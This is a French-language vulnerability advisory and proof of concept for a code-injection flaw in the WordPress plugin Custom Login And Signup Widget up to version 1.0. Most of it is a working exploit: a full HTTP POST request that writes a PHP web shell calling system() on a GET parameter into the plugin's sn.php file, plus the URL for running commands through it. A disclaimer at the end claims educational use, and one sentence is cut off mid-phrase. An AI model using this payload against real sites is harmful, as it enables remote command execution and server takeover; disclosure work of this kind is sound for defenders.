
Le plugin WordPress Custom Login And Signup Widget <= 1.0 est vulnérable à l'exécution de code arbitraire.
La vulnérabilité Contrôle inadéquat de la génération de code (« Injection de code ») dans bitto.Kazi Custom Login And Signup Widget permet l’exécution de code PHP arbitraire par des administrateurs authentifiés.
Ce problème affecte toutes les versions jusqu’à la version 1.0 incluse.
🔥 Score de base : 9.1 (CRITIQUE)
ID CWE : CWE-94 – Contrôle inadéquat de la génération de code (« Injection de code »)
Le plugin permet aux administrateurs de modifier le contenu de sn.php via le champ Nom de l’expéditeur de la page de réglages.
L’entrée fournie par l’utilisateur est écrite directement dans un fichier PHP sans assainissement ni validation.
Par conséquent, tout code PHP fourni dans le paramètre text sera stocké dans un fichier PHP puis exécuté lors d’une requête directe, ce qui permet une .
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
textsn.php (inclusion de configuration du plugin)<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php
Après une injection réussie, accédez-y directement pour exécuter des commandes via :
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id
.php.Ce projet est créé uniquement à des fins éducatives et de recherche.
Toute utilisation des informations fournies se fait à vos propres risques.
L’auteur décline toute responsabilité en cas d’utilisation abusive ou de dommages causés par ce contenu.